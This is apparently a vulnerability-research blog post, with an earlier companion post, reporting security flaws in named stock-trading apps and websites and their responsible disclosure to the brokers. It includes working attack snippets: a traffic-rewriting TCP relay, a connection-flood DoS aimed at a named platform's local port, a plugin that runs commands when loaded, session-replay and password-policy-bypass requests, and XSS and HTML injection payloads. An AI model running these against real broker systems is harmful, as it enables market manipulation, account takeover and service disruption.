RESEARCH | August 7, 2018

Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies

This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details of the research.

Disclaimer

Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.

This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.

Introduction

The days of open outcry on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities is now easier and faster than ever; but this comes with inherent risks.


The valuable information, attack surface, and attack vectors in trading environments are slightly different from those in banking systems.

Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Send buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.

Scope

My analysis started in mid-2017 and concluded in July 2018. It covered the following platforms, many of which are among the most widely used and well-known trading platforms; some also support cryptocurrency trading:

  • 16 Desktop applications
  • 34 Mobile apps
  • 30 Websites

These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer all three types of platform; however, in some cases only one or two were reviewed due to certain limitations:

  • Ally Financial
  • AvaTrade
  • Binance
  • Bitfinex
  • Bitso
  • Bittrex
  • Bloomberg
  • Capital One
  • Charles Schwab
  • Coinbase
  • easyMarkets
  • eSignal
  • ETNA
  • eToro
  • E-TRADE
  • ETX Capital
  • ExpertOption
  • Fidelity
  • Firstrade
  • FxPro
  • GBMhomebroker
  • Grupo BMV
  • IC Markets
  • Interactive Brokers
  • IQ Option
  • Kraken
  • Markets.com
  • Merrill Edge
  • MetaTrader
  • Money.Net
  • NinjaTrader
  • OANDA
  • Personal Capital
  • Plus500
  • Poloniex
  • Robinhood
  • Scottrade
  • TD Ameritrade
  • TradeStation
  • Yahoo! Finance

Devices used:

  • Windows 7 (64-bit)
  • Windows 10 Home Single (64-bit)
  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • iOS 10.4 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

I reviewed basic security controls/features that represent just the tip of the iceberg when compared to more exhaustive lists of security checks per platform.

Results

Unfortunately, the results proved to be much worse than those for retail banking applications. For example, mobile trading apps are less secure than the personal banking apps reviewed in 2013 and 2015.

Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.

While testing, I noted a basic correlation: the biggest brokers are the ones that invest the most in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.

Based on my testing results and opinion, the following trading platforms are the most secure:

  • TD Ameritrade: Web and mobile
  • Charles Schwab: Web and mobile
  • Merrill Edge: Web and mobile
  • MetaTrader 4/5: Desktop and mobile
  • Yahoo! Finance: Web and mobile
  • Robinhood: Web and mobile
  • Bloomberg: Mobile
  • TradeStation: Mobile
  • Capital One: Mobile
  • FxPro cTrader: Desktop
  • IC Markets cTrader: Desktop
  • Ally Financial: Web
  • Personal Capital: Web
  • Bitfinex: Web and mobile
  • Coinbase: Web and mobile
  • Bitso: Web and mobile

The medium- to high-risk vulnerabilities found across the different platforms include fully or partially unencrypted communications, denial-of-service conditions, and authentication and/or session management flaws. Although these platforms implement good security features, they all have areas that should be addressed to improve their security.

The following are the platforms that, in my opinion, must improve in terms of security:

  • Interactive Brokers: Desktop, web, and mobile
  • IQ Option: Desktop, web, and mobile
  • AvaTrade: Desktop and mobile
  • E-TRADE: Web and mobile
  • eSignal: Desktop
  • TD Ameritrade’s Thinkorswim: Desktop
  • Charles Schwab: Desktop
  • TradeStation: Desktop
  • NinjaTrader: Desktop
  • Fidelity: Web
  • Firstrade: Web
  • Plus500: Web
  • Markets.com: Mobile

Unencrypted Communications

Nine desktop applications (64%) and two mobile apps (6%) were observed transmitting data unencrypted. Most applications encrypt most sensitive data in transit; however, in some cases cleartext data could be seen in unencrypted requests.

Among the data seen unencrypted were passwords, balances, portfolios, personal information, and other trading-related data. In most cases of unencrypted transmission, plaintext HTTP was seen; in others, old proprietary protocols or other financial protocols such as FIX were used.

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
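To illustrate how little effort this takes, here is a minimal sketch (in C#) of a logging TCP relay sitting between a victim and a broker’s server. The hostname and ports are hypothetical placeholders; in a real attack, the relay would be placed in the traffic path via a rogue access point or ARP spoofing.

```csharp
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading.Tasks;

// Minimal logging TCP relay: anything the victim's app sends in cleartext
// (HTTP requests, FIX messages, etc.) is readable -- and modifiable -- at
// this vantage point. Hostname and ports are hypothetical placeholders.
class CleartextRelay
{
    static async Task Main()
    {
        var listener = new TcpListener(IPAddress.Any, 8080);
        listener.Start();
        while (true)
        {
            var victim = await listener.AcceptTcpClientAsync();
            _ = HandleAsync(victim); // one relay per victim connection
        }
    }

    static async Task HandleAsync(TcpClient victim)
    {
        using var v = victim;
        using var upstream = new TcpClient("broker.example.com", 80);
        using var vs = v.GetStream();
        using var us = upstream.GetStream();
        await Task.WhenAll(Pump(vs, us, ">>"), Pump(us, vs, "<<"));
    }

    static async Task Pump(NetworkStream from, NetworkStream to, string tag)
    {
        var buf = new byte[4096];
        int n;
        while ((n = await from.ReadAsync(buf)) > 0)
        {
            // A malicious relay could rewrite bid/ask prices right here.
            Console.WriteLine($"{tag} {Encoding.ASCII.GetString(buf, 0, n)}");
            await to.WriteAsync(buf.AsMemory(0, n));
        }
    }
}
```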

For example, the following application uses unencrypted HTTP. In the screenshot, a buy order is shown:

Another interesting example was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms; it acts as a source of market data. During testing, it was noted that the Data Manager authenticates over an unencrypted protocol on TCP port 2189, apparently developed in 1999.

As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. A quick search turned up a document from the SEC stating that the company changed its name to Interactive Data Corporation, the owner of eSignal. In other words, it looks like an in-house protocol developed almost 20 years ago. We could not corroborate this information, though.

The main eSignal login screen also authenticates through a cleartext channel:

FIX is a protocol initiated in 1992 and one of the industry-standard protocols for messaging and trade execution. Currently, it is used by the majority of exchanges and traders. There are guidelines on how to implement it over a secure channel; however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.
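To make this concrete, here is a hedged sketch of what a FIX-style NewOrderSingle message looks like on the wire when no TLS is in place. The tag numbers are standard FIX tags, but the order details are invented and the checksum field is omitted for brevity:

```csharp
using System;

// Sketch of a FIX 4.2-style NewOrderSingle (35=D) as it travels on the
// wire when the channel is not encrypted. All order details below are
// invented examples; tag 10 (checksum) is omitted for brevity.
class FixCleartext
{
    static void Main()
    {
        const char SOH = '\u0001'; // FIX field delimiter
        string body = $"35=D{SOH}49=CLIENT1{SOH}56=BROKER{SOH}" +
                      $"55=AAPL{SOH}54=1{SOH}38=100{SOH}44=207.50{SOH}40=2{SOH}";
        string msg = $"8=FIX.4.2{SOH}9={body.Length}{SOH}{body}";

        // Anyone on the path can read (or rewrite) symbol 55=AAPL,
        // side 54=1 (buy), quantity 38=100, and price 44=207.50.
        Console.WriteLine(msg.Replace(SOH, '|'));
    }
}
```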

A broker that supports FIX:

There are some cases where the application encrypts the communication channel except for certain features. For instance, the Interactive Brokers desktop and mobile applications encrypt all communication except that of iBot, the robot assistant that receives text or voice commands; iBot sends the instructions to the server embedded in a cleartext FIX protocol message:

News related to the positions was also observed in plaintext:

Another instance of an application that uses encryption for all but certain channels is Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server on a scheduled basis through unencrypted HTTP:

A similar case is IQ Option, which sends everything over HTTPS but, for some reason, also sends duplicate unencrypted HTTP requests to the server, disclosing the session cookie.

Others appear to implement their own binary protocols, such as Charles Schwab; however, symbols in watchlists or quoted symbols could be seen in cleartext:

Interactive Brokers supports encryption but uses an insecure channel by default; an inexperienced user who does not know the meaning of “SSL” (Secure Sockets Layer) won’t enable it on the login screen, and some sensitive data will be sent and received without encryption:

Passwords Stored Unencrypted

In seven mobile apps (21%) and three desktop applications (21%), the user’s password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract it, though; this access could be either physical or through malware.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easy), log in through the brokerage firm’s web-based trading platform, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (more than 75%) support two-factor authentication (2FA); however, it’s not enabled by default: the user must go to the configuration and enable it to receive authorization codes by text message or email. Hence, if 2FA is not enabled on the account, it’s possible for an attacker who already knows the password to link a new bank account and withdraw the money from sold securities.

The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:

Base64 is not encryption:
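Base64 is an encoding, not encryption: anyone who recovers the stored value can reverse it instantly, no key required. A minimal sketch, with a hypothetical stored value:

```csharp
using System;
using System.Text;

// Base64 only re-encodes bytes; it provides zero confidentiality.
// The stored value below is a hypothetical example.
class Base64IsNotEncryption
{
    static void Main()
    {
        string stored = "UzNjcjN0UGFzc3chMjM="; // as found in a config file
        string password = Encoding.UTF8.GetString(Convert.FromBase64String(stored));
        Console.WriteLine(password); // prints: S3cr3tPassw!23
    }
}
```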

In some cases, the password was sent to the server as a GET parameter, which is also insecure, since URLs (including their query strings) are commonly stored in browser histories and in server and proxy logs:

One PIN for login and unlocking the app was also seen:

In IQ Option, the password was stored completely unencrypted:

However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:

Trading and Account Information Stored Unencrypted

In the trading context, operational or strategic data must not be stored unencrypted nor sent to any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.

Eight desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though; this access could be either physical or through malware.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

The following screenshots show applications that store sensitive data unencrypted:

Balances:

Investment portfolio:

Buy/sell orders:

Watchlists:

Recently quoted symbols:

Other data:

Trading Programming Languages with DLL Import Capabilities

This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.

The following are a few of the trading platforms with their own trading language:

  • MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
  • NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
  • TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
  • AvaTradeAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
  • (FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)

Some platforms, such as MetaTrader, warn their customers about the dangers of DLL imports and advise them to execute plugins only from trusted sources. However, there are Internet tutorials claiming “to make you rich overnight” with the trading robots they provide. These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox that allows DLL imports. Innocent, non-tech-savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.

The following is a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:

Another basic example is NinjaTrader, which simply allows OS commands through C#’s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe is executed from the chart initialization routine:
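To make the risk concrete, the following is a hedged sketch of what such a booby-trapped plugin could look like. The class layout follows NinjaTrader 8’s NinjaScript conventions but should be treated as illustrative rather than a verified sample; the point is that NinjaScript compiles as ordinary C#, so the entire .NET framework is reachable from an “indicator”:

```csharp
// Illustrative NinjaScript-style indicator (NinjaTrader 8 layout is
// assumed). NinjaScript compiles as C#, so System.Diagnostics -- and
// everything else in .NET -- is available to any plugin the user loads.
using System.Diagnostics;

namespace NinjaTrader.NinjaScript.Indicators
{
    public class InnocentLookingIndicator : Indicator
    {
        protected override void OnStateChange()
        {
            if (State == State.SetDefaults)
            {
                Name = "InnocentLookingIndicator";
            }
            else if (State == State.DataLoaded)
            {
                // Runs with the user's privileges the moment the indicator
                // is added to a chart. calc.exe stands in for an arbitrary
                // payload (downloader, backdoor, and so on).
                Process.Start("calc.exe");
            }
        }
    }
}
```

From the platform’s point of view this is legitimate plugin code, which is exactly why warnings about untrusted plugins and DLL imports matter.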

Denial of Service

Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connection handling of such services.

A common error is not limiting the number of concurrent connections. If a TCP daemon does not limit concurrent connections, applications are susceptible to denial-of-service (DoS) or other types of attacks, depending on the nature of the application.

For example, TD Ameritrade’s Thinkorswim TCP-Orders Server listens on TCP port 2000 on the localhost interface, with no limit on connections nor any waiting time between orders. This leads to the following problems:

  • Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
  • Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
  • A NULL pointer dereference is triggered and an error report (.zip file) is created.

Admittedly, it listens on the local interface only; however, there are still ways to reach this port, such as XMLHttpRequest() in JavaScript running in a web browser.

Memory leakage could be easily triggered by creating as many connections as possible:
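A minimal sketch of such a resource-exhaustion client, pointed at the Thinkorswim order port described above (TCP 2000 on localhost); the loop simply opens sockets and never closes them:

```csharp
using System;
using System.Collections.Generic;
using System.Net.Sockets;

// Opens as many connections as possible against a TCP daemon that
// neither limits concurrent clients nor frees per-connection state.
class ConnectionFlood
{
    static void Main()
    {
        var sockets = new List<TcpClient>(); // keep references so they stay open
        try
        {
            while (true)
            {
                sockets.Add(new TcpClient("127.0.0.1", 2000));
                if (sockets.Count % 100 == 0)
                    Console.WriteLine($"{sockets.Count} connections open");
            }
        }
        catch (SocketException e)
        {
            Console.WriteLine($"Server stopped accepting: {e.Message}");
        }
    }
}
```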

A similar DoS vulnerability due to memory exhaustion was found in eSignal’s Data Manager. As mentioned, eSignal is a known signal provider that integrates with a wide variety of trading platforms and acts as a source of market data; therefore, availability is its most important asset:

It’s recommended to implement a configuration item that allows the user to control the behavior of the TCP order server, such as the maximum number of orders sent per minute as well as the number of seconds to wait between orders, to avoid bottlenecks.

The following capture from Interactive Brokers shows this countermeasure implemented properly: no more than 51 users can be connected simultaneously:

Session Still Valid After Logout

Normally, when the logout button is pressed in an app, the session is terminated on both sides: server and client. Usually, the server deletes the session token from its list of valid sessions and sends back a new empty or random value to clear or overwrite the client’s session token, so the client must reauthenticate next time.

In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:
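A hedged sketch of how this can be verified: save the session cookie before logging out, wait, then replay it against an authenticated endpoint. The URL and cookie name below are hypothetical placeholders, not taken from any specific broker:

```csharp
using System;
using System.Net.Http;
using System.Threading.Tasks;

// Replays a pre-logout session cookie. Endpoint and cookie name are
// hypothetical placeholders, not taken from any specific broker.
class StaleSessionCheck
{
    static async Task Main()
    {
        // UseCookies = false lets us set the Cookie header by hand.
        using var http = new HttpClient(new HttpClientHandler { UseCookies = false });
        var request = new HttpRequestMessage(HttpMethod.Get,
            "https://broker.example.com/account/balances");
        request.Headers.Add("Cookie", "SESSIONID=value-captured-before-logout");

        var response = await http.SendAsync(request);

        // A 200 with account data an hour after logout means the server
        // never invalidated the session; expect a redirect to login instead.
        Console.WriteLine((int)response.StatusCode);
    }
}
```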

Authentication

While most web-based trading platforms support 2FA (more than 75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.

Nowadays, most modern smartphones support fingerprint reading, and most trading apps use it to authenticate their customers. Only eight apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

Weak Password Policies

Some institutions let the users choose easily guessable passwords. For example:

The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.

In some cases, such as in IQ Option and Markets.com, the password policy validation is implemented on the client side only; hence, it is possible to intercept a request and send a weak password to the server:
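Because the check runs only in the browser or app, the server accepts whatever it receives. Here is a hedged sketch of replaying a change-password request directly with a weak password; the endpoint and field names are hypothetical:

```csharp
using System;
using System.Collections.Generic;
using System.Net.Http;
using System.Threading.Tasks;

// Sends a weak password straight to the server, skipping the client-side
// validation entirely. Endpoint and field names are hypothetical.
class WeakPasswordBypass
{
    static async Task Main()
    {
        using var http = new HttpClient();
        var form = new FormUrlEncodedContent(new Dictionary<string, string>
        {
            ["old_password"] = "CurrentP@ssw0rd",
            ["new_password"] = "123456" // rejected by the UI, accepted by the server
        });
        var response = await http.PostAsync(
            "https://broker.example.com/api/change-password", form);
        Console.WriteLine(response.StatusCode);
    }
}
```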

Automatic Logout/Lockout for Idle Sessions

Most web-based platforms log out or lock out the user automatically, but this is not the case for desktop applications (43%) and mobile apps (25%). This security control forces the user to authenticate again after a period of idle time.

Privacy Mode

This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.

The following images show before and after enabling privacy mode in Thinkorswim for mobile:

Hardcoded Secrets in Code and App Obfuscation

Sixteen Android .apk installers (47%) were easily reverse engineered to human-readable code, since they lack obfuscation. Most Java- and .NET-based desktop applications were also easily reverse engineered. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge, shown in the next screenshot.

The goal of obfuscation is to conceal the application’s purpose (security through obscurity) and logic in order to deter reverse engineering and make it more difficult.

In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:

Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) contain traces (hostnames and IPs) of the internal development and testing environments where they were built or tested. Some of these hostnames are reachable from the Internet, and since they are testing systems, they could lack proper protections.

SSL Certificate Validation

Eleven of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on their phone, though.
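On the client side, this class of bug often boils down to a single line: a global validation callback that accepts every certificate, typically added during development against test servers and never removed. The following shows the classic .NET anti-pattern (ServicePointManager is a real API; the snippet illustrates the pattern, not any specific app’s code):

```csharp
using System.Net;

// Anti-pattern: this single line makes every HTTPS connection in the
// process accept ANY certificate, enabling trivial MiTM interception.
class DisabledCertificateValidation
{
    static void Main()
    {
        ServicePointManager.ServerCertificateValidationCallback =
            (sender, certificate, chain, sslPolicyErrors) => true; // never do this
    }
}
```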

The apps that do verify the certificate normally refuse to transmit any data when it cannot be validated; however, only Charles Schwab lets the user decide whether to continue using the app with the certificate provided:

Lack of Anti-exploitation Mitigations

ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack canaries are used to identify whether the stack has been corrupted. These security features make it much more difficult for memory corruption bugs to be exploited to execute arbitrary code.

The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, these features are enabled only in some components, not the entire application. In other cases, components that handle network connections also lack these flags.

Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.

Other Weaknesses

More issues were found in the platforms. For more details, please refer to the white paper. 

Statistics

Since a picture is worth a thousand words, consider the following graphs:

For more statistics, please refer to the white paper.

Responsible Disclosure

One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure. In September 2017, we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher-risk vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.

As of July 27, 2018, 19 brokers with medium- or high-risk vulnerabilities in any of their platforms had been contacted.

TD Ameritrade and Charles Schwab were the brokers that communicated most with IOActive to resolve the reported issues.

For a table with the current status of the responsible disclosure process, please refer to the white paper.

Conclusions and Recommendations

  • Trading platforms are less secure than the applications seen in retail banking.
  • There’s still a long way to go to improve the maturity level of security in trading technologies.
  • End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
  • Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
  • Brokerage firms should also offer security guidance in their online education centers.
  • Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Rating organizations should include security in their reviews.

Side Note

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

Thanks for reading,

Alejandro
@nitr0usmx

This blog post contains a small portion of the entire analysis.
Please refer to the white paper.

RESEARCH | September 26, 2017

Are You Trading Securely? Insights into the (In)Security of Mobile Trading Apps

The days of open shouting on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities is now easier and faster than ever; but this comes with inherent risks.

From the beginning, bad actors have also joined Wall Street’s party, developing clever models for fraudulent gains. Their efforts have included everything from fictitious brokerage firms that ended up being Ponzi schemes[1] to organized cells performing Pump-and-Dump scams.[2] (Pump: buy cheap shares and inflate the price through sketchy financials and misleading statements to the marketplace through spam, social media and other technological means; Dump: once the price is high, sell the shares and collect a profit).

When it comes to financial cybersecurity, it’s worth noting how banking systems are organized when compared to global exchange markets. In banking systems, the information is centralized in one single financial entity; there is one point of failure rather than many, which makes them more vulnerable to cyberattacks.[3] In contrast, global exchange markets are distributed; records of who owns what, who sold/bought what, and to whom, are not stored in a single place, but in many. Like matter and energy, stocks and other securities cannot be created from the void (e.g. by a modified database record within a financial entity). Once issued, they can only be exchanged from one entity to another. That said, the valuable information, attack surface, and attack vectors in trading environments are slightly different from those in banking systems.

 
Picture taken from http://business.nasdaq.com/list/
 

Over the years I’ve used the desktop and web platforms offered by banks in my country with limited visibility of available trade instruments. Today, accessing global capital markets is as easy as opening a Facebook account through online brokerage firms. This is how I gained access to a wider financial market, including US-listed companies. Anyone can buy and sell a wide range of financial instruments on the secondary market (e.g. stocks, ETFs, etc.), derivatives market (e.g. options, binary options, contracts for difference, etc.), forex markets, or the avant-garde cryptocurrency markets.

Most banks with investment solutions and the aforementioned brokerage houses offer mobile platforms to operate in the market. These apps allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Give buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, whether you’re a speculator, a very active intra-day trader, or simply someone who likes to follow long-term buy-and-hold strategies, every single item on the previous list must be kept secret and only known by and shown to its owner.


 

Four months ago, while using my trading app, I asked myself, “with the huge amount of money transacted in the money market, how secure are these mobile apps?” So, there I was, one minute later, starting this research to expose cybersecurity and privacy weaknesses in some of these apps.

Before I pass along my results, I’d like to share the interesting and controversial moral of the story: the app developed by a brokerage firm that suffered a data breach many years ago was shown to be the most secure one.

Scope

My analysis encompassed the latest version of 21 of the most used and well-known mobile trading apps available on the Apple Store and Google Play. Testing focused only on the mobile apps; desktop and web platforms were not tested. While I discovered some security vulnerabilities in the backend servers, I did not include them in this article.

Devices:

  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

I tested the following 14 security controls, which represent just the tip of the iceberg when compared to an exhaustive list of security checks for mobile apps. This may give you a better picture of the current state of these apps’ security. It’s worth noting that I could not test all of the controls in some of the apps either because a feature was not implemented (e.g. social chats) or it was not technically feasible (e.g. SSL pinning that wouldn’t allow data manipulation), or simply because I could not open an account.

Results

Unfortunately, the results proved to be much worse than those for personal banking apps in 2013 and 2015.[4] [5] Cybersecurity has not been on the radar of the FinTech space in charge of developing trading apps. Security researchers have disregarded these apps as well, probably because of a lack of understanding of money markets.

The issues I found in the tested controls are grouped in the following sections. Logos and technical details that mention the name of brokerage institutions were removed from the screenshots, logs, and reverse engineered code to prevent any negative impacts to their customers or reputation.

Cleartext Passwords Exposed

In four apps (19%), the user’s password was sent in cleartext either to an unencrypted XML configuration file or to the logging console. Physical access to the device is required to extract it, though.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easy), log in through any other trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most of the apps require only the current password to link banking accounts and do not implement two-factor authentication (2FA); therefore, no authorization one-time password (OTP) is sent to the user’s phone or email.

In two apps, like the following one, in addition to logging the username and password, authentication takes place over an unencrypted HTTP channel:

In another app, the new password was exposed in the logging console when the user changed their password:

Trading and Account Information Exposed

In the trading context, operational or strategic data must not be sent unencrypted to the logging console nor to any log file. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.

62% of the apps sent sensitive data to log files, and 67% stored it unencrypted. Physical access to the device is required to extract this data.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

Imagine a hypothetical scenario where a high-profile, sophisticated investor loses his phone and the trading app he has been using stores his “Potential Investments” watchlist in cleartext. If the extracted watchlist ends up in the hands of someone who wants to mimic this investor’s strategy, they could buy stocks prior to a price increase. In the worst case, imagine a “Net Worth” figure landing in the wrong hands, say kidnappers, who now know how large a ransom could be.

Balances and investment portfolio leaked in logs:

Buy and sell orders leaked in detail in the logging console:

Personal information stored in configuration files:

“Potential Investments” and “Will Buy Later” watchlists leaked in the logs console:

“Favorites” watchlists leaked in the logs too:

Quoted tickers leaked:

Quoted symbol dumped in detail in the console:

Quoted instruments saved in a local SQLite database:

Account number and balances leaked:

Insecure Communication

Two apps use unencrypted HTTP channels to transmit and receive all data, and 13 of the 19 apps that use HTTPS do not check the authenticity of the remote endpoint by verifying its SSL certificate (SSL pinning); therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on the mobile device, though.

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public Wi-Fi, could see and modify information transmitted to and from the mobile app. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.

For instance, the following app uses an insecure channel for communication by default; an inexperienced user who does not know the meaning of “SSL” (Secure Sockets Layer) won’t enable it on the login screen, and all sensitive data will be sent and received in cleartext, without encryption:

A single app was found to send a log file with sensitive trading data to the server on a scheduled basis over an unencrypted HTTP channel.

Some apps transmit non-sensitive data (e.g. public news or live financial TV broadcasts) through insecure channels, which does not seem to represent a risk to the user.

Authentication and Session Management

Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only five apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

 
Moreover, after clicking the logout button, sessions were still valid on the server side in two apps. Also, another couple of apps enforced lax password policies:

Privacy Mode

A single trading app (look for “the moral of the story” earlier in this article) supports “Privacy Mode,” which protects the customer’s private information from being displayed on the screen in public areas where shoulder-surfing[6] attacks are feasible. The rest of the apps do not implement this useful and important feature.

However, there’s a small bug in this unique implementation: every sensitive figure is masked except in the “Positions” tab where the “Net Liquidity” column and the “Overall Totals” are fully visible:

It’s worth noting that not only balances, positions, and other sensitive values in the trading context should be masked, but also credit card information when entered to fund the account:

Client-side Data Validation

In most, but not all, of the apps that don’t check SSL certificates, it’s possible to perform MiTM attacks and inject malicious JavaScript or HTML code into the server responses. Since the WebViews in ten apps are configured to execute JavaScript code, it’s possible to trigger common Cross-site Scripting (XSS) attacks.
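As a sketch of the injection step: once an attacker can rewrite a cleartext (or unpinned HTTPS) response, appending a script to the HTML served to the WebView is a one-line string operation. The page and payload below are illustrative:

```csharp
using System;
using System.Text;

// Sketch: rewriting an intercepted, non-pinned response so the app's
// WebView executes injected script. Page and payload are illustrative.
class ResponseInjector
{
    static byte[] Inject(byte[] response)
    {
        string html = Encoding.UTF8.GetString(response);
        string payload = "<script>alert(document.cookie);</script>";
        return Encoding.UTF8.GetBytes(html.Replace("</body>", payload + "</body>"));
    }

    static void Main()
    {
        byte[] page = Encoding.UTF8.GetBytes("<html><body>quotes</body></html>");
        Console.WriteLine(Encoding.UTF8.GetString(Inject(page)));
    }
}
```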

XSS triggered in two different apps (<script>alert(document.cookie);</script>):

Fake HTML forms injected to deceive the user and steal credentials:

Root Detection

Many Android apps do not run on rooted devices for security reasons. On a rooted phone or emulator, the user has full control of the system, and thus complete access to files, databases, and logs. Once a user has full access to these elements, it’s easy to extract valuable information.

